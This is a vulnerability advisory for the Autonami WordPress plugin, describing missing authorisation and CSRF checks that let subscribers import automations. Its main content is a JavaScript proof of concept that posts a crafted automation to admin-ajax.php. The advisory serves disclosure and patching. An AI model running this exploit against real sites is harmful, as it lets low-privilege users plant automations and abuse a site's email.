WordPress Plugin Vulnerabilities
Automations By Autonami < 2.1.2 - Subscriber+ Automation Creation
Description
The plugin does not have authorisation and CSRF checks in one of its AJAX action, allowing any authenticated users, such as subscriber to create automations
Proof of Concept
var data = new FormData()
data.append('file',new Blob(['[{"data":{"source":"wp","event":"wp_user_login","start":"1","v":"2"},"meta":{"title":"t","event_meta":"","actions":"","a_track_id":0,"condition":"","run_count":0,"ui":"","requires_update":0,"uiData":"","steps":[{"id":"start","type":"start","data":{"icon":"rocket","event":"wp_user_login","evtGroup":"wp","count":0,"note":""},"hidden":false,"position":{"x":0.0004269199384684752,"y":-23.5},"targetPosition":"top","sourcePosition":"bottom","hasMultiParents":false},{"id":"end","type":"end","data":{"label":"End Automation"},"hidden":false,"position":{"x":0.00015686161315141622,"y":357.5},"targetPosition":"top","sourcePosition":"bottom","hasMultiParents":false},{"id":"3","type":"action","stepId":1,"step_status":2,"hidden":false,"data":[],"position":{"x":0.0007870621141599978,"y":159.5},"targetPosition":"top","sourcePosition":"bottom","hasMultiParents":false}],"links":[{"id":"endlink","source":"3","target":"end","sourceHandle":"","animated":false,"label":"","isHidden":false},{"id":"2-3","source":"start","label":"","target":"3","sourceHandle":"","animated":false}],"count":"3","step_iteration_array":{"1":[{"next":"end","type":"end"}],"start":[{"next":1,"type":"action"}]}},"step_data":{"1":{"ID":"1","aid":"1","type":"2","action":"{\\"action\\":\\"wp_sendemail\\",\\"intergration\\":\\"wp\\"}","status":"1","data":"{\\"sidebarData\\":{\\"bwfan_email_to\\":\\"[email protected]\\",\\"bwfan_email_data\\":{\\"subject\\":\\"test\\",\\"data\\":{\\"preheader\\":\\"\\",\\"utmEnabled\\":false,\\"utm\\":{\\"source\\":\\"Newsletter\\",\\"medium\\":\\"email\\",\\"name\\":\\"\\",\\"content\\":\\"\\",\\"term\\":\\"\\"},\\"isTransactional\\":false,\\"overrideSenderInfo\\":false},\\"mode\\":1,\\"template\\":\\"<\\\\\\/p>Hi {{contact_first_name}},<\\\\\\/p><p><\\\\\\/p><p><span style=\\\\\\"font-size: 14px; font-family: arial, helvetica, sans-serif;\\\\\\">{{business_name}}, {{business_address}}<\\\\\\/span><br \\\\\\/><span style=\\\\\\"font-size: 14px; font-family: arial, helvetica, sans-serif;\\\\\\"><a href=\\\\\\"{{unsubscribe_link}}\\\\\\">unsubscribe<\\\\\\/a><\\\\\\/span><\\\\\\/p>\\"}}}","created_at":"2022-07-10 13:11:27","updated_at":"2022-07-10 13:12:56"}}}]']),'x')
fetch('/wp-admin/admin-ajax.php?action=bwf_import_automations_json_file', {
method: 'POST',
body: data
}).then(response => response.text())
.then(data => console.log(data));
Affects Plugins
Fixed in version 2.1.2
References
Classification
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-07-26 (about 6 months ago)
Added
2022-07-26 (about 6 months ago)
Last Updated
2022-07-26 (about 6 months ago)